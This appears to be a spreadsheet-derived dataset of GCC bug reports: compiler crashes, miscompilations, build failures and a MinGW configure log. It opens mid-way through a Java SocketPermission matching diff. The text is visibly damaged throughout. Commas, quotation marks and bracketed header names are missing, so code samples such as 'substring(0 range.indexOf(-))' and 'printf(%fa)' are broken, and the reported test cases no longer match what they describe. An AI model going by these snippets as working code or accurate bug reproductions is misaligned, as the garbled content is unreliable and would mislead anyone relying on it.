-	else
-	  theirfirstport =
-	    Integer.parseInt(range.substring(0 range.indexOf(-)))
-
-	if (range.endsWith(-))
-	  theirlastport = 65535
-	else if (range.indexOf(-) == -1)
-	  theirlastport = Integer.parseInt(range)
-	else
-	  theirlastport =
-	    Integer.parseInt(range.substring(range.indexOf(-) + 1
-	                                     range.length()))
-        }
+        // This will dump if hostport if all sorts of bad data was passed to
+        // the constructor
-    // Now check them
-    if ((theirfirstport  ourlastport))
-      return false
+        range = p.hostport.substring(portsIndex + 1)
+        portDelimitorIndex = range.indexOf(portDelimitor)
+
+        if (portDelimitorIndex == 0)
+          theirfirstport = 0
+        else if (portDelimitorIndex == -1)
+        {
+          theirfirstport = Integer.parseInt(range)
+          theirlastport = theirfirstport
+        }
+        else
+          theirfirstport = Integer.parseInt(range.substring(0 portDelimitorIndex))
-        // Finally we can check the hosts
-    String ourhost
+        if (range.endsWith(portDelimitor))
+          theirlastport = 65535
+        else
+          theirlastport = Integer.parseInt(range.substring(portDelimitorIndex + 1 range.length()))
-    // Finally we can check the hosts
-    String theirhost
+        theirhost = p.hostport.substring(0 portsIndex)
+      }
-    // Get ours
-    if (hostport.indexOf(:) == -1)
-      ourhost = hostport
-    else
-      ourhost = hostport.substring(0 hostport.indexOf(:))
-
-    // Get theirs
-    if (p.hostport.indexOf(:) == -1)
-      theirhost = p.hostport
-    else
-      theirhost = p.hostport.substring(0 p.hostport.indexOf(:))
-
-        // Are they equal?
-    if (ourhost.equals(theirhost))
-      return true
-
-    // Try the canonical names
-    String ourcanonical = null
-
-        // Try the canonical names
-    String theircanonical = null
-    try
+      // Now check them
+      if ((theirfirstport  ourlastport))
       {
-            ourcanonical = InetAddress.getByName(ourhost).getHostName()
-            theircanonical = InetAddress.getByName(theirhost).getHostName()
+        return false
       }
-    catch (UnknownHostException e)
+      // Are they equal?
+      if (ourhost.equals(theirhost))
+        return true
+
+      // Try the canonical names
+      String ourcanonical = null
+
+      // Try the canonical names
+      String theircanonical = null
+      try
       {
-	// Who didn't resolve?  Just assume current address is canonical enough
-            // Is this ok to do?
-	if (ourcanonical == null)
-	  ourcanonical = ourhost
-	if (theircanonical == null)
-	  theircanonical = theirhost
-        }
+        ourcanonical = InetAddress.getByName(ourhost).getHostName()
+        theircanonical = InetAddress.getByName(theirhost).getHostName()
+      }
+      catch (UnknownHostException e)
+      {
+        // Who didn't resolve?  Just assume current address is canonical enough
+        // Is this ok to do?
+        if (ourcanonical == null)
+          ourcanonical = ourhost
+        if (theircanonical == null)
+          theircanonical = theirhost
+      }
+
+      if (ourcanonical.equals(theircanonical))
+        return true
-    if (ourcanonical.equals(theircanonical))
-      return true
+      // Well last chance. Try for a wildcard
+      int wildcardIndex = ourcanonical.indexOf(wildcard)
-        // Well last chance. Try for a wildcard
-    if (ourhost.indexOf(*.) != -1)
+      if (wildcardIndex != -1 &amp;&amp; ourcanonical.length() &gt; 1)
       {
-            String wild_domain = ourhost.substring(ourhost.indexOf(* + 1))
-	if (theircanonical.endsWith(wild_domain))
-	  return true
+        String wild_domain = ourcanonical.substring(wildcardIndex + 1)
+
+        if (theircanonical.endsWith(wild_domain))
+        {
+          return true
         }
+      }
-        // Didn't make it
-        return false
+      if (ourcanonical.equals(wildcard))
+        return true
+
+      // Didn't make it
+      return false
+// @classpath-bugfix-end
     }
-}
\ No newline at end of file
+}</t>
  </si>
  <si>
    <t>hagar</t>
  </si>
  <si>
    <t>GCC-58676</t>
  </si>
  <si>
    <t>Intrinsic functions not considered pure actual arguments</t>
  </si>
  <si>
    <t>The following example when compiled with recent trunk:
MODULE m
  IMPLICIT NONE
CONTAINS
  SUBROUTINE sub(proc)
    INTERFACE
      PURE FUNCTION proc(x)
        IMPLICIT NONE
        REAL INTENT(IN) :: x
        REAL :: proc
      END FUNCTION proc
    END INTERFACE
    PRINT * proc(0.0)
  END SUBROUTINE sub
END MODULE m
PROGRAM p
  USE m
  IMPLICIT NONE
  INTRINSIC :: sin
  CALL sub(sin)       !xxx
END PROGRAM p
results in an error Interface mismatch in dummy procedure 'proc' ... : Mismatch in PURE attribute which I think (but maybe I've missed something) is erroneous.
All standard intrinsic functions are pure (13.1p2) and elemental intrinsic functions may be associated with a dummy procedure (which cannot be elemental) (12.5.2.9p1) and `sin` is the relevant bullet-less specific for the generic sin (13.6).
See also http://software.intel.com/en-us/forums/topic/476356 and perhaps pr41724.</t>
  </si>
  <si>
    <t>GCC-14289</t>
  </si>
  <si>
    <t>[3.3 Regression] ICE in a register array</t>
  </si>
  <si>
    <t>should it be a compilation error???
COMMAND:
gcc -S -O0 -save-temps pippo.c
OUTPUT:
pippo.c: In function `Nase':
pippo.c:5: warning: address of register variable `a' requested
pippo.c:5: internal compiler error: Segmentation fault
PREPROCESSED FILE:
# 1 pippo.c
# 1 
# 1 
# 1 pippo.c
register int a[2] asm(ebx)
void Nase(void)
{
        int i=6
        a[i]=5
}</t>
  </si>
  <si>
    <t>meccoli</t>
  </si>
  <si>
    <t>GCC-11841</t>
  </si>
  <si>
    <t>[3.3 Regression] The code compiled with -funroll-loops crashes</t>
  </si>
  <si>
    <t>The c code compiled with -funroll-loops and -mcpu=pentium4 crashes. Without
-funroll-loop the program works correctly. gcc-3.2.3 also compiles correct binary.
The program was thoroughly tested with previous versions of gcc and with icc.</t>
  </si>
  <si>
    <t>GCC-64019</t>
  </si>
  <si>
    <t>ICE in extract_constrain_insn</t>
  </si>
  <si>
    <t>Created attachment 34070
reduced testcase
ICE building CPU2000 benchmark 188.ammp. Compiled with 'gcc -c -m32 -O2 -mcpu=power7 -ffast-math unonbon.c'.
unonbon.c:63:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 140 88 272 4 (set (reg:DF 108 31 [374])
        (mem/u/c:DF (lo_sum:SI (reg:SI 9 9 [377])
                (symbol_ref/u:SI (*.LC1) [flags 0x82])) [2  S8 A64])) 466 {*movdf_hardfloat32}
     (expr_list:REG_EQUIV (const_double:DF 1.0e+0 [0x0.8p+1])
        (nil)))
unonbon.c:63:1: internal compiler error: in extract_constrain_insn at recog.c:2230
0x106df363 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/home/pthaugen/src/gcc/trunk/gcc/gcc/rtl-error.c:110
0x106df3bb _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/home/pthaugen/src/gcc/trunk/gcc/gcc/rtl-error.c:121
0x106a5e6f extract_constrain_insn(rtx_insn*)
	/home/pthaugen/src/gcc/trunk/gcc/gcc/recog.c:2230
0x10680a83 reload_cse_simplify_operands
	/home/pthaugen/src/gcc/trunk/gcc/gcc/postreload.c:415
0x10681b4b reload_cse_simplify
	/home/pthaugen/src/gcc/trunk/gcc/gcc/postreload.c:134
0x10681b4b reload_cse_regs_1
	/home/pthaugen/src/gcc/trunk/gcc/gcc/postreload.c:231
0x106834cb reload_cse_regs
	/home/pthaugen/src/gcc/trunk/gcc/gcc/postreload.c:79
0x106834cb execute
	/home/pthaugen/src/gcc/trunk/gcc/gcc/postreload.c:2352
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-66625</t>
  </si>
  <si>
    <t>xorg-server (Ext/Xinerama) fails to build with -O3 optimizations</t>
  </si>
  <si>
    <t>GCC 5.1.0 fails to build xorg-server with the -O3 option with the following output:
xvdisp.c: In function â€˜XineramifyXvâ€™:
xvdisp.c:1783:37: error: array subscript is above array bounds [-Werror=array-bounds]
                 if (MatchingAdaptors[k] &amp;&amp; (MatchingAdaptors[k]-&gt;nPorts &gt; j))
                                     ^
xvdisp.c:1784:31: error: array subscript is above array bounds [-Werror=array-bounds]
                     port-&gt;info[k].id = MatchingAdaptors[k]-&gt;base_id + j
                               ^
xvdisp.c:1786:31: error: array subscript is above array bounds [-Werror=array-bounds]
                     port-&gt;info[k].id = 0
                               ^
cc1: some warnings being treated as errors
Makefile:777: recipe for target 'xvdisp.lo' failed
This does *NOT* happen with gcc-4.9.
The xorg guys think this has to be a gcc bug.
Here is the bug report on their bug tracker:
Bug #91031 https://bugs.freedesktop.org/show_bug.cgi?id=91031
See their bug report for a more detailed explaination why they blame gcc and not their code.
I'm running/building with
- Distro: Arch Linux (rolling-release up-to-date)
- gcc-5.1 is from the official Arch Linux repo.
- Intel x64_64 (Haswell) with -march=native and -mtune=native
I have the following build options set via /etc/makepkg.conf (which is used for package compilation from source on Arch Linux):
CARCH=x86_64
CHOST=x86_64-unknown-linux-gnu
CPPFLAGS=-D_FORTIFY_SOURCE=2
CFLAGS=-march=native -mtune=native -O3 -pipe -fstack-protector-strong --param=ssp-buffer-size=4
CXXFLAGS=-march=native -mtune=native -O3 -pipe -fstack-protector-strong --param=ssp-buffer-size=4
LDFLAGS=-Wl-O2--sort-common--as-needed-zrelro
MAKEFLAGS=-j16
DEBUG_CFLAGS=-g -fvar-tracking-assignments
DEBUG_CXXFLAGS=-g -fvar-tracking-assignments
Changing -O3 to -O2 makes the build complete without fatal errors and results in a working xorg-server.</t>
  </si>
  <si>
    <t>GCC-28337</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with string literals in templates</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 4.0.0:
==============================
template void foo()
{
  (0 ?  : X)+1
}
==============================
bug.cc: In function 'void foo()':
bug.cc:3: internal compiler error: in fold_convert at fold-const.c:2018
Please submit a full bug report [etc.]
Without the template or if both string literals have the same length
the code compiles fine.</t>
  </si>
  <si>
    <t>GCC-31513</t>
  </si>
  <si>
    <t>[4.3 Regression] Miscompilation of Function Passing Bit Field Value to Function</t>
  </si>
  <si>
    <t>This program:
#include 
struct tree_type {
  unsigned int precision : 9
}
void *bork(const void *Ty unsigned Subpart) {
  printf(Subpart == %08x\n Subpart)
  return 0
}
const void *TConvertType(tree_type* type) {
  asm(movl $1104150528 4(%%esp) : : )
  const void *Ty = 0
  return bork(Ty type-&gt;precision)
}
const void *foo(tree_type* type) {
  asm(movl $1104150528 4(%%esp) : : )
  const void *Ty = 0
  unsigned S = type-&gt;precision
  return bork(Ty S)
}
int main()
{
  struct tree_type t
  t.precision = 1
  TConvertType(
  foo(
  return 0
}
Compiled with c++ t.c Should print out:
Subpart == 00000001
Subpart == 00000001
But instead prints out:
Subpart == 41d00001
Subpart == 00000001
(on my iMac). The problem seems to be that in the TConvertType function passes
type-&gt;precision as an HI instead of SI to the bork function. The asm code is:
        movl $1104150528 4(%esp)
        movl    $0 -4(%ebp)
        movl    8(%ebp) %eax
        movzwl  (%eax) %eax
        andw    $511 %ax
        movw    %ax 4(%esp)
        movl    -4(%ebp) %eax
        movl    %eax (%esp)
        call    __Z4borkPKvj
for TConvertType so the %ax isn't putting a full SI onto the stack leaving
garbage in the MSBs of 4(%esp) which bork expects to be 0 of course.
(See http://gcc.gnu.org/ml/gcc/2007-04/msg00237.html)
Dave Korn confirmed this miscompilation: (See http://gcc.gnu.org/ml/gcc/2007-04/msg00239.html)
  Confirmed on x86/cygwin.  I removed the asms just in case they were somehow
confusing the compiler but the generated code is still clearly incorrect.
004010a2 :
  4010a2:       55                      push   %ebp
  4010a3:       89 e5                   mov    %esp%ebp
  4010a5:       83 ec 18                sub    $0x18%esp
  4010a8:       c7 45 fc 00 00 00 00    movl   $0x00xfffffffc(%ebp)
  4010af:       8b 45 08                mov    0x8(%ebp)%eax
  4010b2:       0f b7 00                movzwl (%eax)%eax
  4010b5:       66 25 ff 01             and    $0x1ff%ax
  4010b9:       66 89 44 24 04          mov    %ax0x4(%esp)
  4010be:       8b 45 fc                mov    0xfffffffc(%ebp)%eax
  4010c1:       89 04 24                mov    %eax(%esp)
  4010c4:       e8 87 ff ff ff          call   401050 
  4010c9:       c9                      leave
  4010ca:       c3                      ret
  4010cb:       90                      nop
  Looking at tree dumps for the two functions ConvertType and foo
 Function const void* foo(tree_type*) (_Z3fooP9tree_type)
const void* foo(tree_type*) (type)
{
  unsigned int S
  const void * Ty
  void * D.2934
  const void * D.2933
   D.2932
  # BLOCK 2
  # PRED: ENTRY (fallthru)
  Ty = 0B
  D.2932 = type-&gt;precision
  S = (unsigned int) D.2932
  D.2934 = bork (Ty S)
  D.2933 = D.2934
  return D.2933
  # SUCC: EXIT
}
 Function const void* TConvertType(tree_type*) (_Z12TConvertTypeP9tree_type)
const void* TConvertType(tree_type*) (type)
{
  const void * Ty
  void * D.2926
   D.2925
  const void * D.2924
  # BLOCK 2
  # PRED: ENTRY (fallthru)
  Ty = 0B
  D.2925 = type-&gt;precision
  D.2926 = bork (Ty D.2925)
  D.2924 = D.2926
  return D.2924
  # SUCC: EXIT
}
the difference is just in whether the  representing the bitfield
is passed directly to bork as a parameter when forcibly cast via an unsigned
it gets it right.  The generated RTL appears to then select a minimal size for
 and not take account of argument promotion:
 Function const void* TConvertType(tree_type*) (_Z12TConvertTypeP9tree_type)
 Generating RTL for tree basic block 2
 Ty = 0B
(insn 7 5 0 (set (mem/f/c/i:SI (plus:SI (reg/f:SI 54 virtual-stack-vars)
                (const_int -4 [0xfffffffc])) [0 Ty+0 S4 A32])
        (const_int 0 [0x0])) -1 (nil)
    (nil))
 D.2925 = type-&gt;precision
(insn 9 7 11 (set (reg/f:SI 62)
        (mem/f/c/i:SI (reg/f:SI 53 virtual-incoming-args) [0 type+0 S4 A32]))
-1 (nil)
    (nil))
(insn 11 9 0 (parallel [
            (set (reg:HI 59 [ D.2925 ])
                (and:HI (mem/s:HI (reg/f:SI 62) [0 S2 A32])
                    (const_int 511 [0x1ff])))
            (clobber (reg:CC 17 flags))
        ]) -1 (nil)
    (nil))
 D.2926 = bork (Ty D.2925)
(insn 12 11 13 (set (mem:HI (plus:SI (reg/f:SI 56 virtual-outgoing-args)
                (const_int 4 [0x4])) [0 S2 A32])
        (reg:HI 59 [ D.2925 ])) -1 (nil)
    (nil))</t>
  </si>
  <si>
    <t>isanbard</t>
  </si>
  <si>
    <t>GCC-38402</t>
  </si>
  <si>
    <t>Undocumented Yz constraint</t>
  </si>
  <si>
    <t>x86 has
 We use the Y prefix to denote any number of conditional register sets:
  z   First SSE register.
  2   SSE2 enabled
  i   SSE2 inter-unit moves enabled
  m   MMX inter-unit moves enabled
Most of them are internal to gcc. But some instructions use the fixed XMM0
register. We may need the Yz constraint for asm statement. Shouldn't it
be documented?</t>
  </si>
  <si>
    <t>GCC-50712</t>
  </si>
  <si>
    <t>[4.7 regression] invalid argument to gimple call</t>
  </si>
  <si>
    <t>Created attachment 25480
File triggering the crash
Compiling the attached (which is from Wine) with -O2 I get
  file.c: In function 'MSVCRT_vfprintf_s':
  file.c:4026:1: error: invalid argument to gimple call valist
  # .MEM_3 = VDEF 
  ret_8 = MSVCRT_vfprintf_s.part.7 (file_2(D) format_5(D) valist)
  file.c:4026:1: internal compiler error: verify_gimple failed
This must have happened about three days ago.</t>
  </si>
  <si>
    <t>GCC-66049</t>
  </si>
  <si>
    <t>[6 regression] Few AArch64 extend and add with shift tests generates sub optimal code with trunk gcc 6.0.</t>
  </si>
  <si>
    <t>After preventing conversion of shift to mults in combiner https://gcc.gnu.org/viewcvs/gcc?view=revision&amp;revision=222874
few Aarch64 target tests generates suboptimal code.
Tests that now fail but worked before:
---------------------------------------
gcc.target/aarch64/adds1.c scan-assembler adds\tw[0-9]+ w[0-9]+ w[0-9]+ lsl 3
gcc.target/aarch64/adds1.c scan-assembler adds\tx[0-9]+ x[0-9]+ x[0-9]+ lsl 3
gcc.target/aarch64/adds3.c scan-assembler-times adds\tx[0-9]+ x[0-9]+ x[0-9]+
 sxtw 2
gcc.target/aarch64/extend.c scan-assembler add\tw[0-9]+.*uxth #?1
gcc.target/aarch64/extend.c scan-assembler add\tx[0-9]+.*uxtw #?3
gcc.target/aarch64/extend.c scan-assembler sub\tw[0-9]+.*uxth #?1
gcc.target/aarch64/extend.c scan-assembler sub\tx[0-9]+.*uxth #?1
gcc.target/aarch64/extend.c scan-assembler sub\tx[0-9]+.*uxtw #?3
gcc.target/aarch64/subs1.c scan-assembler subs\tw[0-9]+ w[0-9]+ w[0-9]+ lsl 3
gcc.target/aarch64/subs1.c scan-assembler subs\tx[0-9]+ x[0-9]+ x[0-9]+ lsl 3
gcc.target/aarch64/subs3.c scan-assembler-times subs\tx[0-9]+ x[0-9]+ x[0-9]+
 sxtw 2
Sample Test case 
----------------
unsigned long long
adddi_uxtw (unsigned long long a unsigned int i)
{
  /* { dg-final { scan-assembler add\tx\[0-9\]+.*uxtw #?3 } } */
  return a + ((unsigned long long)i &lt;&lt; 3)
}
Before 
 add     x0 x0 x1 uxtw 3
Now 
ubfiz   x1 x1 3 32
add     x0 x1 x0</t>
  </si>
  <si>
    <t>vekumar</t>
  </si>
  <si>
    <t>GCC-23251</t>
  </si>
  <si>
    <t>Missing Darwin specific '-framework' flag on the gcc/g++ command-line</t>
  </si>
  <si>
    <t>This is a darwin specific flag that is passed to the linker and should be present.
// Begin myTest.cpp
#include 
int main(inst argc char *argv[])
{
   printf(Hello World\n)
   return 0
}
// End myTest.cpp
// ====================
// Begin myLog.txt
jrevans% 
jrevans% /usr/bin/g++ -o myTest myTest.cpp -framework CoreFoundation
jrevans% ./myTest
Hello World
jrevans% $COTS/bin/g++ -o myTest myTest.cpp -framework CoreFoundation
g++: CoreFoundation: No such file or directory
cc1plus: error: unrecognized command line option -framework
jrevans% echo $COTS
/Users/jrevans/local
jrevans% 
// End myLog.txt
// ====================
Where gcc was compiled with the following flags:
jrevans% ../gcc-3.4.4/configure --prefix=/Users/jrevans/local --enable-shared
--enable-threads --disable-nls --enable-languages=cc++f77
jrevans% make CFLAGS='-O' LIBCFLAGS='-g -O2' LIBCXXFLAGS='-g -O2
-fno-implicit-templates' bootstrap
See here for further reference:
http://developer.apple.com/documentation/MacOSX/Conceptual/BPFrameworks/Tasks/IncludingFrameworks.html</t>
  </si>
  <si>
    <t>jrevans1</t>
  </si>
  <si>
    <t>GCC-35649</t>
  </si>
  <si>
    <t>Incorrect printf warning: expect double has float</t>
  </si>
  <si>
    <t>With the -Wformat option The code
void foo( float a )
{
    printf(%fa)
}
give the warning:
foo.c:3: warning: format '%f' expects type 'double' but argument 2 has type 'float'
I believe this is unnecessary because float is promoted to double in variadic functions.</t>
  </si>
  <si>
    <t>trevmrgn+bug</t>
  </si>
  <si>
    <t>GCC-41685</t>
  </si>
  <si>
    <t>[OOP]  internal compiler error: verify_flow_info failed</t>
  </si>
  <si>
    <t>The attached source code(s) produce the subject error. 
Scenario: gfortran with provisional patches for PR41656 and PR 41581 applied. 
-------------------------------------------------------------------
[sfilippo@localhost T3]$ gfortran -c const_mod.f03 base_mat_mod.f03 s_base_mat_mod.f03 s_csr_mat_mod.f03 s_mat_mod.f03 
s_mat_mod.f03: In function â€˜s_sizeofâ€™:
s_mat_mod.f03:47:0: error: case labels not sorted: 
case 1: is greater than case 1: but comes before it.
s_mat_mod.f03:47:0: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
--------------------------------------------------------------------
Interestingly enough if I glue the files together the ICE disappears 
(which is inconvenient for testing).
-------------------------------------------------------------------
[sfilippo@localhost T3]$ cat  const_mod.f03 base_mat_mod.f03 s_base_mat_mod.f03 s_csr_mat_mod.f03 s_mat_mod.f03  &gt;test-der6.f03 
[sfilippo@localhost T3]$ gfortran -c test-der6.f03 
[sfilippo@localhost T3]$ /bin/rm *mod *o
[sfilippo@localhost T3]$ gfortran -c test-der6.f03 
[sfilippo@localhost T3]$ 
-----------------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-4566</t>
  </si>
  <si>
    <t>gcc: Internal compiler error.</t>
  </si>
  <si>
    <t>gcc crashes while compiling POSE Palm emulator (Emulator_Src_3.3)
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Linux/i386
How-To-Repeat:
build POSE</t>
  </si>
  <si>
    <t>GCC-36541</t>
  </si>
  <si>
    <t>Make failed with error about system headers</t>
  </si>
  <si>
    <t>I have problem with building GCC v4.3.1 (Release) under Mingw system.
System: WindowsXP+SP3
Config.log:
----
This file contains any messages produced by compilers while
running configure to aid debugging if configure makes a mistake.
It was created by configure which was
generated by GNU Autoconf 2.59.  Invocation command line was
  $ ../gcc-4.3.1/configure --enable-languages=cobjcc++
## --------- ##
## Platform. ##
## --------- ##
hostname = ANDRY_HOST
uname -m = i686
uname -r = 1.0.11(0.46/3/2)
uname -s = MINGW32_NT-5.1
uname -v = 2007-01-12 12:05
/usr/bin/uname -p = unknown
/bin/uname -X     = unknown
/bin/arch              = unknown
/usr/bin/arch -k       = unknown
/usr/convex/getsysinfo = unknown
hostinfo               = unknown
/bin/machine           = unknown
/usr/bin/oslevel       = unknown
/bin/universe          = unknown
PATH: .
PATH: /usr/local/bin
PATH: /mingw/bin
PATH: /bin
PATH: /e/WINDOWS.0/system32
PATH: /e/WINDOWS.0
PATH: /e/WINDOWS.0/System32/Wbem
PATH: /c/Programs/Tools/Console/Console v2.00b139
## ----------- ##
## Core tests. ##
## ----------- ##
configure:1505: checking build system type
configure:1523: result: i686-pc-mingw32
configure:1558: checking host system type
configure:1572: result: i686-pc-mingw32
configure:1580: checking target system type
configure:1594: result: i686-pc-mingw32
configure:1637: checking for a BSD-compatible install
configure:1692: result: /bin/install -c
configure:1703: checking whether ln works
configure:1725: result: yes
configure:1729: checking whether ln -s works
configure:1733: result: yes
configure:2885: checking for gcc
configure:2901: found /bin/gcc
configure:2911: result: gcc
configure:3155: checking for C compiler version
configure:3158: gcc --version &amp;5
gcc.exe (GCC) 3.4.5 (mingw-vista special r3)
Copyright (C) 2004 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
configure:3161: $? = 0
configure:3163: gcc -v &amp;5
Reading specs from C:/mingw/bin/../lib/gcc/mingw32/3.4.5/specs
Configured with: ../gcc-3.4.5-20060117-3/configure --with-gcc --with-gnu-ld --with-gnu-as --host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable-languages=cc++f77adaobjcjava --disable-win32-registry --disable-shared --enable-sjlj-exceptions --enable-libgcj --disable-java-awt --without-x --enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-hash-synchronization --enable-libstdcxx-debug
Thread model: win32
gcc version 3.4.5 (mingw-vista special r3)
configure:3166: $? = 0
configure:3168: gcc -V &amp;5
gcc.exe: `-V' option must have argument
configure:3171: $? = 1
configure:3194: checking for C compiler default output file name
configure:3197: gcc    conftest.c  &gt;&amp;5
configure:3200: $? = 0
configure:3246: result: a.exe
configure:3251: checking whether the C compiler works
configure:3257: ./a.exe
configure:3260: $? = 0
configure:3277: result: yes
configure:3284: checking whether we are cross compiling
configure:3286: result: no
configure:3289: checking for suffix of executables
configure:3291: gcc -o conftest.exe    conftest.c  &gt;&amp;5
configure:3294: $? = 0
configure:3319: result: .exe
configure:3325: checking for suffix of object files
configure:3346: gcc -c   conftest.c &gt;&amp;5
configure:3349: $? = 0
configure:3371: result: o
configure:3375: checking whether we are using the GNU C compiler
configure:3399: gcc -c   conftest.c &gt;&amp;5
configure:3405: $? = 0
configure:3409: test -z 
			 || test ! -s conftest.err
configure:3412: $? = 0
configure:3415: test -s conftest.o
configure:3418: $? = 0
configure:3431: result: yes
configure:3437: checking whether gcc accepts -g
configure:3458: gcc -c -g  conftest.c &gt;&amp;5
configure:3464: $? = 0
configure:3468: test -z 
			 || test ! -s conftest.err
configure:3471: $? = 0
configure:3474: test -s conftest.o
configure:3477: $? = 0
configure:3488: result: yes
configure:3505: checking for gcc option to accept ANSI C
configure:3575: gcc  -c -g -O2  conftest.c &gt;&amp;5
configure:3581: $? = 0
configure:3585: test -z 
			 || test ! -s conftest.err
configure:3588: $? = 0
configure:3591: test -s conftest.o
configure:3594: $? = 0
configure:3612: result: none needed
configure:3630: gcc -c -g -O2  conftest.c &gt;&amp;5
conftest.c:2: error: syntax error before me
configure:3636: $? = 1
configure: failed program was:
| #ifndef __cplusplus
|   choke me
| #endif
configure:3821: checking for g++
configure:3837: found /bin/g++
configure:3847: result: g++
configure:3863: checking for C++ compiler version
configure:3866: g++ --version &amp;5
g++.exe (GCC) 3.4.5 (mingw-vista special r3)
Copyright (C) 2004 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
configure:3869: $? = 0
configure:3871: g++ -v &amp;5
Reading specs from C:/mingw/bin/../lib/gcc/mingw32/3.4.5/specs
Configured with: ../gcc-3.4.5-20060117-3/configure --with-gcc --with-gnu-ld --with-gnu-as --host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable-languages=cc++f77adaobjcjava --disable-win32-registry --disable-shared --enable-sjlj-exceptions --enable-libgcj --disable-java-awt --without-x --enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-hash-synchronization --enable-libstdcxx-debug
Thread model: win32
gcc version 3.4.5 (mingw-vista special r3)
configure:3874: $? = 0
configure:3876: g++ -V &amp;5
g++.exe: `-V' option must have argument
configure:3879: $? = 1
configure:3882: checking whether we are using the GNU C++ compiler
configure:3906: g++ -c   conftest.cc &gt;&amp;5
configure:3912: $? = 0
configure:3916: test -z 
			 || test ! -s conftest.err
configure:3919: $? = 0
configure:3922: test -s conftest.o
configure:3925: $? = 0
configure:3938: result: yes
configure:3944: checking whether g++ accepts -g
configure:3965: g++ -c -g  conftest.cc &gt;&amp;5
configure:3971: $? = 0
configure:3975: test -z 
			 || test ! -s conftest.err
configure:3978: $? = 0
configure:3981: test -s conftest.o
configure:3984: $? = 0
configure:3995: result: yes
configure:4037: g++ -c -g -O2  conftest.cc &gt;&amp;5
configure:4043: $? = 0
configure:4047: test -z 
			 || test ! -s conftest.err
configure:4050: $? = 0
configure:4053: test -s conftest.o
configure:4056: $? = 0
configure:4082: g++ -c -g -O2  conftest.cc &gt;&amp;5
conftest.cc: In function `int main()':
conftest.cc:13: error: `exit' was not declared in this scope
configure:4088: $? = 1
configure: failed program was:
| /* confdefs.h.  */
| 
| #define PACKAGE_NAME 
| #define PACKAGE_TARNAME 
| #define PACKAGE_VERSION 
| #define PACKAGE_STRING 
| #define PACKAGE_BUGREPORT 
| /* end confdefs.h.  */
| 
| int
| main ()
| {
| exit (42)
|   
|   return 0
| }
configure:4037: g++ -c -g -O2  conftest.cc &gt;&amp;5
configure:4043: $? = 0
configure:4047: test -z 
			 || test ! -s conftest.err
configure:4050: $? = 0
configure:4053: test -s conftest.o
configure:4056: $? = 0
configure:4082: g++ -c -g -O2  conftest.cc &gt;&amp;5
configure:4088: $? = 0
configure:4092: test -z 
			 || test ! -s conftest.err
configure:4095: $? = 0
configure:4098: test -s conftest.o
configure:4101: $? = 0
configure:4188: checking for gnatbind
configure:4215: result: no
configure:4268: checking for gnatmake
configure:4295: result: no
configure:4307: checking whether compiler driver understands Ada
configure:4330: result: no
configure:4339: checking how to compare bootstrapped objects
configure:4364: result: cmp --ignore-initial=16 $$f1 $$f2
configure:4484: checking for correct version of gmp.h
configure:4507: gcc -c -g -O2   conftest.c &gt;&amp;5
configure:4513: $? = 0
configure:4517: test -z 
			 || test ! -s conftest.err
configure:4520: $? = 0
configure:4523: test -s conftest.o
configure:4526: $? = 0
configure:4528: result: yes
configure:4542: checking for correct version of mpfr.h
configure:4573: gcc -o conftest.exe -g -O2    conftest.c  -lmpfr -lgmp &gt;&amp;5
configure:4579: $? = 0
configure:4583: test -z 
			 || test ! -s conftest.err
configure:4586: $? = 0
configure:4589: test -s conftest.exe
configure:4592: $? = 0
configure:4616: gcc -o conftest.exe -g -O2    conftest.c  -lmpfr -lgmp &gt;&amp;5
configure:4622: $? = 0
configure:4626: test -z 
			 || test ! -s conftest.err
configure:4629: $? = 0
configure:4632: test -s conftest.exe
configure:4635: $? = 0
configure:4637: result: yes
configure:5971: checking for bison
configure:5987: found /bin/bison
configure:5997: result: bison -y
configure:6017: checking for bison
configure:6033: found /bin/bison
configure:6043: result: bison
configure:6062: checking for gm4
configure:6091: result: no
configure:6062: checking for gnum4
configure:6091: result: no
configure:6062: checking for m4
configure:6078: found /bin/m4
configure:6088: result: m4
configure:6107: checking for flex
configure:6123: found /bin/flex
configure:6133: result: flex
configure:6153: checking for flex
configure:6169: found /bin/flex
configure:6179: result: flex
configure:6198: checking for makeinfo
configure:6214: found /bin/makeinfo
configure:6224: result: makeinfo
configure:6257: checking for expect
configure:6286: result: no
configure:6304: checking for runtest
configure:6333: result: no
configure:6443: checking for ar
configure:6459: found /bin/ar
configure:6469: result: ar
configure:6578: checking for as
configure:6594: found /bin/as
configure:6604: result: as
configure:6713: checking for dlltool
configure:6729: found /bin/dlltool
configure:6739: result: dlltool
configure:6771: checking for ld
configure:6797: result: C:/mingw/bin/../lib/gcc/mingw32/3.4.5/../../../../mingw32/bin/ld.exe
configure:6983: checking for lipo
configure:7012: result: no
configure:7118: checking for nm
configure:7134: found /bin/nm
configure:7144: result: nm
configure:7253: checking for ranlib
configure:7269: found /bin/ranlib
configure:7279: result: ranlib
configure:7383: checking for strip
configure:7399: found /bin/strip
configure:7409: result: strip
configure:7513: checking for windres
configure:7529: found /bin/windres
configure:7539: result: windres
configure:7648: checking for windmc
configure:7677: result: no
configure:7783: checking for objcopy
configure:7799: found /bin/objcopy
configure:7809: result: objcopy
configure:7918: checking for objdump
configure:7934: found /bin/objdump
configure:7944: result: objdump
configure:8092: checking for cc
configure:8121: result: no
configure:8092: checking for gcc
configure:8108: found /bin/gcc
configure:8118: result: gcc
configure:8247: checking for c++
configure:8263: found /bin/c++
configure:8273: result: c++
configure:8402: checking for gcc
configure:8418: found /bin/gcc
configure:8428: result: gcc
configure:8552: checking for gcj
configure:8581: result: no
configure:8707: checking for gfortran
configure:8736: result: no
